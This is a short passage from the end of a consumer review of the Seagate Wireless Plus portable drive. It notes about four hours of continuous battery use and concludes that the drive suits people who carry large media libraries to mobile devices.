packaging. It was more like four hours of continuous use. Conclusion The Seagate Wireless Plus drive is a great solution for those who want to carry very large media libraries with them and have access to them from any mobile device. Small and easy to carry, simple to use, and decent battery life make this an HT Guys favorite!